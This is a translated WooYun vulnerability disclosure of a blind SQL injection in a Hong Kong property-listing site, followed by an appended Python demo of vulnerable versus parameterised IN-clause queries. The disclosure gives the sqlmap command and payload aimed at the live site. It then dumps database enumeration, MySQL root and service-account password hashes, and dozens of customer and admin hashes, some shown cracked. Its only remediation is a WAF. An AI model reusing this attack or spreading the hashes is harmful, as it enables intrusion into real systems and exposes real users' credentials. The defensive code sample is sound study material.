Vulnerability summary

Defect ID: wooyun-2015-0153452

Title: SQL injection at a location on Square Foot online (DBA privileges; root password leaked; tens of millions of site records leaked; a large number of user passwords leaked) (Hong Kong)

Vendor: Square Foot online

Author: 路人甲

Submitted: 2015-11-11 10:10

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-11-11: Details reported to the vendor, awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Square Foot online is an independent website, promoting and showcasing properties for sale and rent from Hong Kong's leading independent real estate agents. The aim of squarefoot.com.hk is to ensure that a property is given the most effective exposure to sell or let as quickly as possible, using a coherent and user friendly online platform.
The website is home to the leading industry real estate agents, who actively upload their property listings in the Hong Kong and international property sections. The property listings are regularly monitored to ensure that the end user is privy to the most up to date and accurate database of properties available in this market.
squarefoot.com.hk is a leading media brand in Hong Kong that focuses on all property related matters, and targeted towards the English-reading population of Hong Kong, both expatriate and Asian.
If you are selling or letting your home, ask your property agent to advertise your property on squarefoot.com.hk. It's convenient, easy-to-use and an effective means to display your property to a mass audience, both inside and outside of Hong Kong.
If you are interested in advertising on our website, please contact us for our competitive rates and more information on +852 3965 4300 or email [email protected].
In addition, we welcome any feedback that you may have to help us constantly improve our site. Thank you.
Read more at http://www.squarefoot.com.hk/section/about-us/#I31PrcIxGfytVlV3.99

Details:

URL: http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B

python sqlmap.py -u "http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B" -p districts[] --technique=BT --random-agent --batch --count --search -C pass


Database: sf-www
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| sqft_xml_record_detail | 39164263 |
| sqft_xml_record | 24016093 |

Proof of vulnerability:

---
Parameter: districts[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
current user: 'sf-www@%'
current user is DBA: True
database management system users [4]:
[*] 'munin'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'sf-www'@'%'
database management system users password hashes:
[*] munin [1]:
password hash: *95D29F091A8FA51345E5507E3FDF2BBCFF3E619D
[*] root [1]:
password hash: *DF8B6D01CDC2E63465E13927EF6317CFCF370863
[*] sf-www [1]:
password hash: *8D6D4EA7D1D87A779624A0324EB15169D4B17A8B
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: districts[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: sf-disable
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| sqft_properties | 106626 |
+-----------------------------------------------+---------+
Database: designidea
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| image_tags | 11544 |
| sqft_image_upload_tmp | 3616 |
| images | 2875 |
| project_tags | 1366 |
| images20140825 | 1138 |
| sqft_news | 557 |
| customers_sessions | 331 |
| configuration | 261 |
| countries | 239 |
| sessions | 236 |
| project | 185 |
| zones | 181 |
| products_description | 84 |
| sqft_news_20141016 | 73 |
| categories_description | 63 |
| customers | 48 |
| action_recorder | 40 |
| products_options_values | 33 |
| manufacturers_info | 30 |
| contact_history | 29 |
| project_tag_categories | 29 |
| products | 28 |
| products_to_categories | 28 |
| images_tag_categories | 27 |
| categories | 21 |
| customers_favourites | 21 |
| district | 18 |
| configuration_group | 15 |
| products_options | 15 |
| products_attributes | 13 |
| sec_directory_whitelist | 13 |
| orders_status | 12 |
| products_options_values_to_products_options | 11 |
| manufacturers | 10 |
| tag_type | 10 |
| profile_type | 8 |
| address_format | 5 |
| products_images | 4 |
| specials | 4 |
| languages | 3 |
| currencies | 2 |
| administrators | 1 |
| banners | 1 |
| banners_history | 1 |
| counter | 1 |
| geo_zones | 1 |
| products_attributes_download | 1 |
| reviews | 1 |
| reviews_description | 1 |
| tax_class | 1 |
| tax_rates | 1 |
| whos_online | 1 |
| zones_to_geo_zones | 1 |
+-----------------------------------------------+---------+
Database: performance_schema
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+-----------------------------------------------+---------+
Database: sf-www-20150616
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| sqft_buildings_20150616 | 19914 |
+-----------------------------------------------+---------+
Database: mysql
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| `user` | 4 |
| db | 1 |
| proc | 1 |
| proxies_priv | 1 |
+-----------------------------------------------+---------+
Database: sf-www
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| sqft_xml_record_detail | 39164263 |
| sqft_xml_record | 24016093 |
| sqft_addresses_20130822 | 4086808 |
| sqft_addresses | 3477077 |
| sqft_user_histories | 2697923 |
| sqft_properties_features | 2415272 |
| phpbb_sessions | 2014661 |
| sqft_wong | 1383214 |
| sqft_wong_20151006 | 1380016 |
| sqft_wong_20150520 | 1319189 |
| sqft_wong2 | 1319122 |
| sqft_wong_live2 | 1305379 |
| sqft_wong_20150504 | 1298368 |
| phpbb_topics_track | 704744 |
| phpbb_topics_watch | 686978 |
| sqft_properties_users | 621352 |
| sqft_refertofriend | 618460 |
| sqft_properties | 391997 |
| sqft_contact_history | 342559 |
| phpbb_posts | 320877 |
| phpbb_topics_posted | 305590 |
| phpbb_topics | 279830 |
| phpbb_user_group | 237344 |
| sqft_import_log | 176096 |
| phpbb_users | 156278 |
| `phpbb_users.20140924` | 151964 |
| report_users | 142148 |
| report_users_emarsys | 101945 |
| sqft_overseas_properties | 87778 |
| sqft_wong_test1 | 84846 |
| sqft_wong_test2 | 79449 |
| sqft_overseas_properties_backup | 70948 |
| sqft_iphone_users | 69542 |
| sqft_properties_upload_img_logs | 57941 |
| sqft_buildings_matching_20141015 | 42691 |
| sqft_buildings_matching_20141027_b4_update | 42691 |
| sqft_web_saveprop | 34175 |
| sqft_user_csv_formats | 31823 |
| sqft_buildings_matching | 31163 |
| sqft_buildings_old | 31163 |
| sqft_buildings_matching_20140912 | 30332 |
| sqft_buildings_matching_20140924 | 30332 |
| sqft_buildings_matching_20140908 | 30309 |
| pp_iphone_property_stat | 28244 |
| sqft_properties_matching | 26502 |
| sqft_buildings | 20555 |
| sqft_buildings_matching_sqft_to_gohome | 20543 |
| sqft_buildings_20150908 | 20532 |
| sqft_buildings_20150714 | 19960 |
| sqft_buildings_20150622_corrupted | 19957 |
| sqft_buildings_20150622 | 19944 |
| sqft_buildings_20150102 | 19311 |
| sqft_buildings_20141223 | 19308 |
| sqft_buildings_20141219 | 19296 |
| sqft_buildings_20141217 | 19253 |
| phpbb_log | 16867 |
| `sqft_buildings_jack(original)` | 16500 |
| sqft_buildings_jack_20140904 | 16037 |
| sqft_prnewswire | 14837 |
| phpbb_sessions_keys | 13668 |
| gohome_buildings | 11007 |
| sqft_buildings_matching_gohome_to_sqft | 11007 |
| sqft_android_users | 10589 |
| sqft_view_report | 10467 |
| sqft_web_recent_search | 10388 |
| sqft_subscriptions_addedbiglist | 9477 |
| sqft_web_recentprop | 9450 |
| phpbb_banlist | 8420 |
| phpbb_users_login_log | 7443 |
| phpbb_privmsgs_to | 7100 |
| sqft_subscriptions | 6961 |
| sqft_banners_sections | 6953 |
| report_subscription_emails | 6804 |
| sqft_subscriptions_users | 6593 |
| sqft_subscriptions_ericbackup | 6589 |
| sqft_buildings_change_log | 6578 |
| sqft_unsubscription_history | 5900 |
| sqft_iphone_monthly_district_leads_report | 5024 |
| sqft_audit | 4935 |
| sqft_servicedapartmentlayoutoptions | 4934 |
| sqft_estate | 4901 |
| sqft_premiere_track | 4683 |
| phpbb_forums_track | 4550 |
| sqft_haunted | 4216 |
| oasis_iphone_property_stat | 4053 |
| phpbb_confirm | 4005 |
| sqft_emailalert | 3820 |
| phpbb_privmsgs | 3563 |
| sqft_android_monthly_district_leads_report | 3132 |
| sqft_listinghistory | 2444 |
| sqft_consultancy_agents_promo_codes | 2299 |
| sqft_users | 2284 |
| sqft_iphone_total_page_view | 2271 |
| sqft_users20140729 | 2116 |
| pp_iphone_users | 2021 |
| sqft_users_20131230 | 1909 |
| sqft_the_space_video_click_record | 1789 |
| sqft_sections | 1772 |
| sqft_buildings_add_requests | 1712 |
| sqft_iphone_stat | 1687 |
| sqft_banners | 1641 |
| sqft_copy_image | 1601 |
| pp_iphone_stat | 1489 |
| sqft_web_save | 1464 |
| sqft_iphone_banners_details | 1414 |
| sqft_android_banners_details | 1411 |
| sqft_buildings_add_requests_property_listings | 1407 |
| sqft_vote2015_voter | 1247 |
| sqft_vote2015_voter_option | 1247 |
| sqft_users_backup | 1233 |
| phpbb_bookmarks | 1170 |
| oasis_iphone_stat | 1092 |
| sqft_vote2014_voter | 985 |
| sqft_vote2014_voter_option | 985 |
| sqft_banners_backup | 983 |
| sqft_android_stat | 923 |
| sqft_android_total_page_view | 841 |
| sqft_user_plans | 801 |
| sqft_the_space_life_style | 782 |
| sqft_school_kindergarten | 735 |
| sqft_news | 712 |
| sqft_month_report | 684 |
| sqft_newdevelopment_news_nw_link | 569 |
| sqft_newdevelopment_news_nw | 548 |
| sqft_buildings_add_requests_20141120 | 540 |
| sqft_newdevelopment_news_nw_bkup | 539 |
| sqft_school_primary | 501 |
| sqft_premiere | 484 |
| oasis_iphone_users | 457 |
| sqft_school_secondary | 457 |
| phpbb_users_info | 450 |
| sqft_users_districts | 449 |
| oncc_report_uid | 414 |
| phpbb_acl_roles_data | 395 |
| sqft_vote2013_voter_option | 395 |
| sqft_vote2013_voter | 354 |
| phpbb_users_reset_password | 350 |
| sqft_servicedapartments_options | 344 |
| phpbb_acl_groups | 334 |
| sqft_mod_ap_addresses | 314 |
| sqft_buildings_deleted_records | 295 |
| phpbb_config | 262 |
| sqft_news_backup | 249 |
| sqft_countries | 243 |
| sqft_vote2012_voter_option | 243 |
| sqft_nationalities | 240 |
| sqft_random_find_an_agent | 240 |
| sqft_vote2012_voter | 234 |
| sqft_users_exclude | 225 |
| pp_iphone_total_page_view | 215 |
| sqft_newdevelopment | 207 |
| phpbb_modules | 199 |
| sqft_user_csv_translations | 181 |
| sqft_servicedapartments | 179 |
| sqft_bannergroups | 177 |
| sqft_consultancy_agents_orders_districts | 173 |
| sqft_groups_permissions | 162 |
| sqft_vote_dev | 158 |
| sqft_school_international | 154 |
| sqft_servicedapartmentlayouts | 150 |
| sqft_catagories_companies | 149 |
| sqft_companies | 149 |
| sqft_iphone_monthly_report | 144 |
| sqft_wong_deleted_records | 134 |
| sqft_translates | 125 |
| sqft_translates_backup | 125 |
| sqft_web_footer | 123 |
| oasis_iphone_total_page_view | 122 |
| sqft_vote_2010 | 119 |
| phpbb_acl_options | 117 |
| sqft_districts | 106 |
| sqft_districts_backup | 101 |
| sqft_vote | 101 |
| sqft_districts_20141223 | 100 |
| sqft_servicedapartments_users | 99 |
| gohome_districts | 95 |
| sqft_internationals_users | 92 |
| sqft_user_csv_translations1 | 91 |
| gohome_buildings_matching_log | 85 |
| phpbb_poll_options | 83 |
| sqft_newdeveloper | 80 |
| sqft_random_properties | 80 |
| sqft_internationals | 76 |
| sqft_features | 72 |
| sqft_bannerlayouts | 71 |
| sqft_survey2011 | 69 |
| sqft_vote2014_nominee | 69 |
| sqft_c21book | 68 |
| sqft_ppsurvery | 67 |
| phpbb_extensions | 66 |
| phpbb_profile_fields_data | 66 |
| sqft_developments_new | 61 |
| sqft_permissions | 61 |
| sqft_updates | 60 |
| sqft_vote2015_nominee | 60 |
| sqft_vote2015_nominee1 | 60 |
| sqft_refer5friend | 58 |
| sqft_developments_users | 57 |
| sqft_transactions_estate_cache | 53 |
| sqft_transactions_district_cache | 51 |
| phpbb_bots | 50 |
| pp_iphone_monthly_report | 48 |
| sqft_developments | 48 |
| oasis_iphone_monthly_report | 46 |
| sqft_catagories | 44 |
| sqft_the_space_author | 44 |
| sqft_android_monthly_report | 43 |
| sqft_properties_approval | 43 |
| phpbb_smilies | 42 |
| sqft_district_leader_users | 40 |
| sqft_findingevent | 39 |
| sqft_user_jobs | 37 |
| phpbb_forums | 36 |
| sqft_banners_liv_group | 35 |
| sqft_banners_elite | 31 |
| sqft_fengshui | 29 |
| sqft_the_space | 28 |
| sqft_sclipboard | 26 |
| sqft_suspend_account_log | 26 |
| sqft_consultancy_agents | 25 |
| sqft_newdevelopment_news | 25 |
| phpbb_acl_roles | 24 |
| sqft_android_banners | 24 |
| sqft_iphone_banners | 24 |
| sqft_user_cities | 24 |
| sqft_vote2014_category | 23 |
| phpbb_drafts | 22 |
| sqft_avignon | 22 |
| sqft_the_space_section | 22 |
| sqft_layouts | 21 |
| sqft_overseas_properties_search_region | 21 |
| sqft_vote2015_category | 20 |
| sqft_banners_prime_miami | 19 |
| sqft_catagories_sponsors | 19 |
| sqft_properties_last_old_record | 18 |
| sqft_school_districts | 18 |
| sqft_updates_sections | 17 |
| sqft_aastock | 16 |
| sqft_transactions_new_home_cache | 15 |
| sqft_fengshui_test | 13 |
| sqft_articles | 12 |
| pp_iphone_branch_list | 11 |
| sqft_banners_cbre | 11 |
| sqft_banners_henry_wiltshire | 11 |
| sqft_banners_richmonts | 11 |
| sqft_banners_starfish | 11 |
| sqft_banners_tclhk_luxury_projects_miami | 11 |
| sqft_web_users | 11 |
| phpbb_icons | 10 |
| sqft_banners_citylife | 10 |
| sqft_currencies | 10 |
| sqft_hamptons | 10 |
| sqft_overseas_properties_type | 10 |
| phpbb_extension_groups | 9 |
| sqft_banners_city_lcp2 | 9 |
| sqft_banners_westbank | 9 |
| sqft_consultancy_agents_orders | 9 |
| sqft_pclipboard | 9 |
| sqft_press_release | 9 |
| sqft_showcase | 9 |
| sqft_user_income | 9 |
| oasis_iphone_agent_list | 7 |
| phpbb_groups | 7 |
| sqft_audit_action | 7 |
| sqft_featuregroups | 7 |
| phpbb_profile_fields_lang | 6 |
| pp_iphone_sole_agent_properties | 6 |
| sqft_banners_chined_international | 6 |
| sqft_buildings_testing | 6 |
| sqft_audit_section | 5 |
| sqft_developers | 5 |
| sqft_plans | 5 |
| sqft_search_alert | 5 |
| sqft_servicedapartmentspecialfeatures | 5 |
| phpbb_reports_reasons | 4 |
| sqft_android_email | 4 |
| sqft_banners_bacc_lead | 4 |
| sqft_banners_meridien_group | 4 |
| sqft_banners_sumitomo_lcp3 | 4 |
| sqft_banners_tcl_lcp | 4 |
| sqft_contacts | 4 |
| sqft_fengshui_section | 4 |
| sqft_groups | 4 |
| sqft_iphone_email | 4 |
| sqft_overseas_product_type | 4 |
| sqft_transaction_region_cache | 4 |
| `table` | 3 |
| phpbb_attachments | 3 |
| phpbb_lang | 3 |
| phpbb_profile_lang | 3 |
| sqft_consultancy_agents_packages | 3 |
| sqft_hotproperties | 3 |
| sqft_internationals_new | 3 |
| phpbb_reports | 2 |
| phpbb_zebra | 2 |
| sqft_banners_platinumrise | 2 |
| sqft_building_features | 2 |
| sqft_properties_exclude | 2 |
| sqft_sizeunits | 2 |
| sqft_system | 2 |
| oncc_report | 1 |
| phpbb_acl_users | 1 |
| phpbb_bbcodes | 1 |
| phpbb_profile_fields | 1 |
| phpbb_ranks | 1 |
| phpbb_styles | 1 |
| phpbb_styles_imageset | 1 |
| phpbb_styles_theme | 1 |
| sqft_consultancy_agents_promo_codes_sets | 1 |
+-----------------------------------------------+---------+
Database: information_schema
+-----------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------+---------+
| INNODB_BUFFER_PAGE | 655359 |
| INNODB_BUFFER_PAGE_LRU | 569523 |
| COLUMNS | 5447 |
| STATISTICS | 1083 |
| KEY_COLUMN_USAGE | 541 |
| PARTITIONS | 483 |
| TABLES | 483 |
| TABLE_CONSTRAINTS | 441 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| USER_PRIVILEGES | 86 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| PROCESSLIST | 14 |
| PARAMETERS | 10 |
| ENGINES | 9 |
| SCHEMATA | 7 |
| REFERENTIAL_CONSTRAINTS | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| INNODB_TRX | 4 |
| INNODB_BUFFER_POOL_STATS | 1 |
| ROUTINES | 1 |
| SCHEMA_PRIVILEGES | 1 |
+-----------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: designidea
Table: administrators
[1 column]
+---------------+
| Column |
+---------------+
| user_password |
+---------------+
Database: designidea
Table: customers_info
[2 columns]
+---------------------+
| Column |
+---------------------+
| password_reset_date |
| password_reset_key |
+---------------------+
Database: designidea
Table: customers
[1 column]
+--------------------+
| Column |
+--------------------+
| customers_password |
+--------------------+
Database: sf-www
Table: sqft_users
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: sf-www
Table: phpbb_users
[4 columns]
+-------------------+
| Column |
+-------------------+
| user_newpasswd |
| user_pass_convert |
| user_passchg |
| user_password |
+-------------------+
Database: sf-www
Table: sqft_subscriptions_users
[1 column]
+---------------+
| Column |
+---------------+
| user_password |
+---------------+
Database: sf-www
Table: sqft_web_users
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: sf-www
Table: sqft_users_20131230
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: sf-www
Table: report_users_emarsys
[1 column]
+--------------------+
| Column |
+--------------------+
| password_generated |
+--------------------+
Database: sf-www
Table: sqft_users_backup
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: sf-www
Table: report_users
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: sf-www
Table: phpbb_forums
[1 column]
+----------------+
| Column |
+----------------+
| forum_password |
+----------------+
Database: sf-www
Table: phpbb_bbcodes
[4 columns]
+---------------------+
| Column |
+---------------------+
| first_pass_match |
| first_pass_replace |
| second_pass_match |
| second_pass_replace |
+---------------------+
Database: sf-www
Table: phpbb_users.20140924
[4 columns]
+-------------------+
| Column |
+-------------------+
| user_newpasswd |
| user_pass_convert |
| user_passchg |
| user_password |
+-------------------+
Database: sf-www
Table: sqft_users20140729
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: designidea
Table: administrators
[1 entry]
+--------------------------------------------+
| user_password |
+--------------------------------------------+
| $P$Ds9UCy52Z4v4Jumj5.JblC8mxjONDX/ (admin) |
+--------------------------------------------+
Database: designidea
Table: customers_info
[0 entries]
+---------------------+--------------------+
| password_reset_date | password_reset_key |
+---------------------+--------------------+
+---------------------+--------------------+
Database: designidea
Table: customers
[48 entries]
+---------------------------------------------+
| customers_password |
+---------------------------------------------+
| $P$D/o8qQvZCZ9tDJt.4.1hP7y0iLKmIj1 () |
| $P$D2dyynZpjBOEpm.8VG4F4vg/sFaGbf/ |
| $P$D3j7svUUgrthUGy1hYoY0ToLz8c0ve. () |
| $P$D3plN5bxafZBCerSq6quMraVPF3Pfd/ (123456) |
| $P$D6ocM896ufcXGtQj6hX9VPNdBEdIay0 (123456) |
| $P$D7nuhjUrh/KYi.0uGOdWCxvE5vO60u. |
| $P$D80WQuAxp0PqAdo2bnM9XDOwjTWH/O1 |
| $P$D97v0NONt1l5kYjMUT3VGGgokteBKt1 |
| $P$DaGiBt/Swhu3xb.EjQiJvEJRApX.ZQ. () |
| $P$DaR01YnT24Lypua1JFT3wm/P.kb8tI1 (123456) |
| $P$DaRyaGoX84cuhdCzC6AebmqG/EcRwY0 () |
| $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ () |
| $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ () |
| $P$DcARmxi1jJ0CsNe7Ct1xQ10YjThRaF. |
| $P$Dd8ALaWPNtUfYlJpTRB9OWTPRENGdd0 () |
| $P$DDH.fl2n9tz4WITIc04yV5G2iLdAJQ. (123456) |
| $P$DdKwzesc0K7cQTX3KnLBYE2vIRVXHm/ () |
| $P$DEcNvrPy9G86SoYQg8eant/sGU.g7e/ |
| $P$DF9R6ScSqvv8/Lx.ywoojWN2dikZoU1 () |
| $P$DgsGNOxkQK6aKAq66EyhHDXu1OnwX00 () |
| $P$DKqGhosw2Qi3MCkpMh.48r8VyqSSuZ/ |
| $P$DKudN/aaEW8t/E8MM9hs/mR1oZHOAQ0 (123456) |
| $P$DlbTnul7S/rs6SPNvNPh3ZsEY41PPD0 () |
| $P$DldpafhYtpkr4KNzU75KCZR0tWTuUT1 |
| $P$DlITxlqXNPNEm4fziIFdZIqnLrkE3N/ () |
| $P$DLO4VXPJwwu/iaM4M184jgkdqh0aO7/ |
| $P$DlTPvreyODI28OU3jHYGxPYXb.tYcM. () |
| $P$Dm.RYeZa9fQgMQ3khbNKLDNVy67csx1 |
| $P$Dn66xKZm2MPo9NXH5ubT2j1vVDARkV. |
| $P$Do9FKQDhnl7ykY7pKpGNp1lX46dzPP/ |
| $P$DofvWL4RIuvYJxlCD80AbJqCjdm1Al1 |
| $P$DOVGE3V1G2yZUmAN3JaDP6MFGWz1cf/ |
| $P$DqAz4x0N9Pb9zXT6Av1RCx/PKkcJbB0 () |
| $P$DQBRf450n.gej9rmxiijm8ZuBt/EdN. |
| $P$DqrxcBfIzUz0OP4JLETYICU/9uI9At1 () |
| $P$DS8JyoW5/dzEwEI0RIj49HGJtribau. |
| $P$DSCRzyTd1aIp0fkS4e/ivj3S4AsP0O0 |
| $P$DSnG6aU48TBiMDBENbexLe0Dvgarz0/ |
| $P$DSzyINeZ/2iuK/MrrmLqXayqIK3fp0/ |
| $P$DU7oKrfz/ynFVm.z0HNAU.flxNwep80 |
| $P$DurOVlhb/FvYX69iP/LJ6/YGohxKOK0 () |
| $P$Dux3wRfjhHJRzoTth8g2Yq/ws4HkSw0 |
| $P$DUxWxdrs6ln7y6sNFm/jK6BUInD1tZ0 () |
| $P$DVVlSKYF8PrFsLX6y7TDjsALLa3gUp1 () |
| $P$DxV75pJSjYi0ouLYhBIcs1qXSJag4g1 (123456) |
| $P$DY.slHKp.cXP/Ql5zbFhdbb12X69FE0 |
| $P$Dywr/WzzhU2VrfqacE4w3vo23FHaRw. |

Remediation:

Put a WAF in front of it.

Copyright notice: when reposting, credit the source: 路人甲@乌云
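The injection point in this report is the `districts[]` array parameter, which sqlmap confirmed as boolean-based blind: the payload closes the value with `)` and re-opens with `(`, which is exactly what happens when each array element is concatenated into an `IN (...)` list. A WAF only filters the symptom; the root-cause fix is to validate each element and bind it with a placeholder. The example below is added here and is not code from the Square Foot site or from the report; the `sqft_properties` columns, the sample rows and the SQLite back end are constructed assumptions, and the two search functions are hypothetical names, one showing the concatenation pattern and one the hardened version.

```python
"""
Array query parameter (districts[]) folded into an IN clause:
string concatenation versus validated, placeholder-bound values.

Added example, not from the Square Foot site or the WooYun report.
Schema, column names and rows are constructed for the demo; the real
schema behind the serviced-apartments search is unknown.
"""
import sqlite3

# Constructed sample rows (assumption): id, area, district_id, name
ROWS = [
    (1, 1, 95, "Serviced apartment A"),
    (2, 1, 95, "Serviced apartment B"),
    (3, 1, 96, "Serviced apartment C"),
    (4, 2, 95, "Serviced apartment D"),
]


def make_db():
    """In-memory SQLite stand-in for the site's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sqft_properties "
        "(id INTEGER, area INTEGER, district_id INTEGER, name TEXT)"
    )
    conn.executemany("INSERT INTO sqft_properties VALUES (?,?,?,?)", ROWS)
    return conn


def search_vulnerable(conn, area, districts):
    """Concatenates every districts[] element straight into the SQL text.

    With a value such as "95) AND 1=2 AND (1=1" the parentheses close the
    IN list early, so the attacker-controlled condition decides whether
    rows come back; that row-count difference is the signal behind the
    boolean-based blind finding in the report.
    """
    in_list = ",".join(districts)
    sql = (
        f"SELECT id FROM sqft_properties WHERE area = {area} "
        f"AND district_id IN ({in_list}) ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, area, districts):
    """Validates each districts[] element as a non-negative integer and
    binds area and every district through placeholders, so request input
    can only ever reach the database as data, never as SQL."""
    if not str(area).isdigit():
        raise ValueError(f"invalid area: {area!r}")
    district_ids = []
    for value in districts:
        if not str(value).isdigit():
            raise ValueError(f"invalid district id: {value!r}")
        district_ids.append(int(value))
    if not district_ids:
        return []
    placeholders = ",".join("?" * len(district_ids))
    sql = (
        "SELECT id FROM sqft_properties WHERE area = ? "
        f"AND district_id IN ({placeholders}) ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql, [int(area), *district_ids])]


def compare(conn):
    """Runs the same inputs through both functions and reports whether a
    true/false condition pair changes the vulnerable result (the blind
    oracle) and whether the safe version rejects the crafted value."""
    true_cond = ["95) AND 1=1 AND (1=1"]
    false_cond = ["95) AND 1=2 AND (1=1"]
    vuln_true = search_vulnerable(conn, "1", true_cond)
    vuln_false = search_vulnerable(conn, "1", false_cond)
    try:
        search_safe(conn, "1", true_cond)
        safe_rejects = False
    except ValueError:
        safe_rejects = True
    return {
        "vulnerable_oracle_observable": vuln_true != vuln_false,
        "safe_rejects_crafted_value": safe_rejects,
    }


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "1", ["95"]))       # normal request
    print(search_safe(db, "1", ["95", "96"]))       # normal multi-district request
    print(compare(db))
```

Reading the `compare` output: the vulnerable function returns different row sets for the two conditions, which is the observable behaviour sqlmap enumerated the whole server through; the hardened function refuses the value before any SQL is built, and the integer check also blocks the `)` needed to break out of the list regardless of what a WAF in front might let through.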


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-11-20 16:24

Vendor reply:

The vulnerability has been reported to the website's contact person.

Latest status:

None yet